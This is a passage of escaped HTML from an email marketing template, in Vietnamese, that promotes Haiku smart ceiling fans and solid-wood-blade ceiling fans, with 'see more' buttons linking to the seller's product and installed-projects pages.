collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-49p83\\\" style=\\\"max-width: 320px;min-width: 298.98px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_15\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px 0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU - SMART CEILING FANS<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_16\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\"><strong>THI\\u1ebeT K\\u1ebe TH\\u1ee6 C\\u00d4NG<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 13px; \\\"><strong>MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe THI\\u1ebeT K\\u1ebe T\\u1eeaNG KH\\u00d4NG GIAN<\\/strong><\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 10px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #0e0f13; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Haiku v\\u1edbi thi\\u1ebft k\\u1ebf chuy\\u00ean nghi\\u1ec7p ki\\u1ec3m so\\u00e1t hi\\u1ec7u qu\\u1ea3 ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n \\u1edf m\\u1ee9c t\\u1ed1i \\u01b0u t\\u1eebng v\\u00f2ng quay th\\u00f4ng qua c\\u00f4ng ngh\\u1ec7 c\\u1ea3m bi\\u1ebfn\\u00a0<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_9\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 14px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh\\\" style=\\\"height:37px; v-text-anchor:middle; width:109px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"301\\\" style=\\\"width: 301px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50p17\\\" style=\\\"max-width: 320px;min-width: 301.02px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764909825-haiku_caramel_bamboo.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 301.02px;\\\" width=\\\"301.02\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"289\\\" style=\\\"width: 289px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-48p17\\\" style=\\\"max-width: 320px;min-width: 289.02px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764821104-abacus.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 289.02px;\\\" width=\\\"289.02\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"310\\\" style=\\\"width: 310px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-51p83\\\" style=\\\"max-width: 320px;min-width: 310.98px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_27\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px 0px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6 (SOLID WOOD)<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_28\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 0px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\"><strong>KI\\u1ec2U D\\u00c1NG HI\\u1ec6N \\u0110\\u1ea0I<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 13px; \\\"><strong>THO\\u1ea2I M\\u00c1I S\\u00c1NG T\\u1ea0O TU\\u1ef2 CH\\u1eccN M\\u00c0U<\\/strong><\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #0e0f13; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Hi\\u1ec7n nay qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 t\\u1ef1 nhi\\u00ean qua x\\u1eed l\\u00fd ch\\u1ed1ng cong v\\u00eanh ho\\u1eb7c \\u0111\\u01b0\\u1ee3c x\\u1eed l\\u00fd th\\u00e0nh t\\u1ea5m nguy\\u00ean kh\\u1ed1i \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u ng\\u01b0\\u1eddi \\u01b0a chu\\u1ed9ng b\\u1edfi t\\u00ednh \\u0111\\u1ed9c \\u0111\\u00e1o v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi c\\u00e1c thi\\u1ebft k\\u1ebf n\\u1ed9i th\\u1ea5t hi\\u1ec7n nay. B\\u1edfi g\\u1ed7 t\\u1ef1 nhi\\u00ean (Solid Wood) \\u0111\\u01b0\\u1ee3c \\u01b0a chu\\u1ed9ng b\\u1edfi d\\u1ec5 ph\\u1ed1i m\\u00e0u v\\u00e0 tu\\u1ef3 ch\\u1ec9nh tone m\\u00e0u c\\u00f9ng v\\u1edbi c\\u00e1c n\\u1ed9i th\\u1ea5t nh\\u00e0 chung c\\u01b0\\/nh\\u00e0 ph\\u1ed1 c\\u00f3 thi\\u1ebft k\\u1ebf g\\u1ed7 \\u00f3c ch\\u00f3, g\\u1ed7 s\\u1ed3i... t\\u1ea1o \\u0111i\\u1ec3m nh\\u1ea5n cho c\\u0103n ph\\u00f2ng c\\u00e0ng th\\u00eam phong c\\u00e1ch.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_7\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-nha-o\\\" style=\\\"height:37px; v-text-anchor:middle; width:109px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-nha-o\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/du-an-da-trien-khai\\\" style=\\\"height:57px; v-text-anchor:middle; width:256px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#db1908\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/du-an-da-trien-khai\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #db1908; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:20px 40px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM D\\u1ef0 \\u00c1N L\\u1eaeP \\u0110\\u1eb6T<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if 